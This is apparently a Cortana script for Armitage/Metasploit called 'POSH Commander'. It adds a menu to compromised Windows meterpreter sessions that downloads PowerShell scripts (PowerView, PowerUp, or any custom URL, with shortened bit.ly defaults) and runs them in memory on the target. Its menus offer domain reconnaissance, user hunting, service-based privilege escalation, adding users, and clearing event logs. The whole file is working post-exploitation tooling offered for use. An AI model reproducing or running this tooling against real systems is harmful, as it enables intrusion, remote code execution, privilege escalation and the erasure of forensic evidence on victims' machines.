# POSH Commander # # This Cortana script works with a Metasploit module to allow you to utilize Powershell's Invoke Expression (IEX) # and .Net functionalities to download and run a script in memory on your target Windows host. Once a compromised Windows host # is activated in Armitage/Cortana, a menu is presented upon right-click of the host. # # Prerequisite: Place the remote_powershell.rb Metasploit module in your "metasploit-framework/modules/post/windows/manage/" directory. # # If you're running a script from Github, be sure to point your shortened url to the "raw" version I.E. "https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1" # # Created by: rvrsh3ll @424f424f # # Veil Project: https://github.com/Veil-Framework/ # PowerView and PowerUp blog by harmj0y: http://blog.harmj0y.net/ # Misc. Powershell Commands: http://ss64.com/ps/ # on session_sync { local('$sid'); if (-iswinmeterpreter $1) { popup meterpreter_bottom { menu "Posh Commander" { item "Veil-PowerView" { spawn(&veilPowerView, $sid => $1); } item "Veil-PowerUp" { spawn(&veilPowerUp, $sid => $1); } item "Custom Script" { spawn(&customScript, $sid => $1); } item "Misc. Local Commands" { spawn(&miscCommands, $sid => $1); } item "Custom Local Command" { spawn(&custLocCommands, $sid => $1); } } } } } sub veilPowerView { global('$console @commands $args $argsprompt $command $scriptUrl'); $console = console(); $console = open_console_tab("meterpreter $sid"); $scriptUrl = prompt_text("URL to the PowerView script", "http://bit.ly/142Nmad"); @commands = @( %(commands => "Get-ShuffledArray"), %(commands => "Get-ComputerProperties"), %(commands => "Invoke-ComputerFieldSearch"), %(commands => "Get-HostIP"), %(commands => "Test-Server"), %(commands => "Get-NetDomain"), %(commands => "Get-NetDomainControllers"), %(commands => "Get-NetCurrentUser"), %(commands => "Get-NetUsers"), %(commands => "Get-NetUser"), %(commands => "Invoke-NetUserAdd"), %(commands => "Get-NetComputers"), %(commands => "Get-NetGroups"), %(commands => "Get-NetGroup"), %(commands => "Invoke-NetGroupUserAdd"), %(commands => "Get-NetFileServers"), %(commands => "Get-NetShare"), %(commands => "Get-NetLoggedon"), %(commands => "Get-NetConnections"), %(commands => "Get-NetSessions"), %(commands => "Get-NetFiles"), %(commands => "Get-UserProperties"), %(commands => "Invoke-CheckLocalAdminAccess"), %(commands => "Invoke-Netview"), %(commands => "Invoke-UserHunter"), %(commands => "Invoke-StealthUserHunter"), %(commands => "Invoke-ShareFinder"), %(commands => "Invoke-FindLocalAdminAccess"), %(commands => "Invoke-UserDescSearch"), %(commands => "Invoke-FindVulnSystems") ); # open table to select a command to send prompt_list("Veil-PowerView Commands", @("Run", "Cancel"), @('commands'), @commands, $null, 500, 700); on item_selected { if ($1 eq "Run") { $argsprompt = prompt_confirm("Would you like to add arguments to this command?", "Yes", "No"); if ($argsprompt eq "0") { $args = prompt_text("Enter your additional arguments"); $command = "$2 $args"; } else if ($argsprompt eq "1") { $args = $null; $command = "$2"; } } else if ($1 eq "Cancel") { return; } sendCommand(); } on tab_close { quit(); } } sub veilPowerUp { global('$console @commands $args $argsprompt $command $vpvuri $scriptUrl'); $console = console(); $console = open_console_tab("meterpreter $sid"); $scriptUrl = prompt_text("URL to the PowerUp script", "http://bit.ly/1DQsDGn"); @commands = @( %(commands => "Get-ServiceUnquoted"), %(commands => "Get-ServiceEXEPerms"), %(commands => "Get-ServicePerms"), %(commands => "Invoke-ServiceUserAdd"), %(commands => "Write-UserAddServiceBinary"), %(commands => "Write-UserAddMSI"), %(commands => "Write-ServiceEXE"), %(commands => "Restore-ServiceEXE"), %(commands => "Invoke-ServiceStart"), %(commands => "Invoke-ServiceStop"), %(commands => "Invoke-ServiceEnable"), %(commands => "Invoke-ServiceDisable"), %(commands => "Get-ServiceDetails"), %(commands => "Invoke-FindDLLHijack"), %(commands => "Invoke-FindPathDLLHijack"), %(commands => "Get-RegAlwaysInstallElevated"), %(commands => "Get-RegAutoLogon"), %(commands => "Get-UnattendedInstallFiles"), %(commands => "Invoke-AllChecks") ); prompt_list("Veil-PowerUp Commands", @("Run", "Cancel"), @('commands'), @commands, $null, 500, 700); on item_selected { if ($1 eq "Run") { $argsprompt = prompt_confirm("Would you like to add arguments to this command?", "Yes", "No"); if ($argsprompt eq "0") { $set = prompt_text("Enter your additional arguments"); $command = "$2 $args"; } else if ($argsprompt eq "1") { $args = $null; $command = "$2"; } } else if ($1 eq "Cancel") { return; } sendCommand(); } on tab_close { quit(); } } sub customScript { global('$console $command $scriptUrl'); $console = console(); $console = open_console_tab("meterpreter $sid"); $scriptUrl = prompt_text("URL to your script"); $command = prompt_text("Script command and arguments"); sendCommand(); } sub miscCommands { global('$localCmd $console @commands @information $scriptUrl $command $argsprompt'); $console = console(); $console = open_console_tab("meterpreter $sid"); @commands = @( %(commands => '$PSVersionTable', information => "Get Powershell Version"), %(commands => 'Get-Service', information => "Provides a list of all of the services that are installed on the system"), %(commands => 'Get-Process', information => "Display a list of all of the processes that are currently running on the system"), %(commands => 'Stop-Process', information => "Stop a running process"), %(commands => 'Start-Process', information => "Start one or more processes"), %(commands => 'Get-EventLog', information => "Read EventLog"), %(commands => 'Clear-EventLog', information => "Delete all entries from an event log"), %(commands => 'Get-Acl', information => "Get permission settings for a file or registry key"), %(commands => 'Set-Acl', information => "Set Access Control List permissions from on a file (or object)."), %(commands => 'Get-PSDrive', information => "Get drive information"), %(commands => 'Restart-Computer', information => "Restart the operating system on a computer") ); prompt_list("Misc. Commands", @("Run", "Cancel"), @('commands', 'information'), @commands, $null, 1000, 400); on item_selected { if ($1 eq "Run") { $argsprompt = prompt_confirm("Would you like to add arguments to this command?", "Yes", "No"); if ($argsprompt eq "0") { $args = prompt_text("Enter your additional arguments"); $localCmd = "\"\& \{$2 $args\}\""; } else if ($argsprompt eq "1") { $args = $null; $localCmd = "\"\& \{$2\}\""; } cmd($console, "use post/windows/manage/powershell/remote_powershell"); cmd_set($console, %( SESSION => "$sid", LOCAL => "$localCmd" )); cmd($console, "run -j"); } else if ($1 eq "Cancel") { return; } on tab_close { quit(); } } } sub custLocCommands { global('$localCmd $command'); $console = console(); $console = open_console_tab("meterpreter $sid"); $command = prompt_text("Enter your custom Cmdlet String to run with all arguments"); $localCmd = "\"\& \{$command\}\""; cmd($console, "use post/windows/manage/powershell/remote_powershell"); cmd_set($console, %( SESSION => "$sid", LOCAL => "$localCmd" )); cmd($console, "run -j"); } sub sendCommand { cmd($console, "use post/windows/manage/powershell/remote_powershell"); cmd_set($console, %( SESSION => "$sid", SCRIPT => "$scriptUrl", COMMAND => "$command" )); cmd($console, "run -j"); }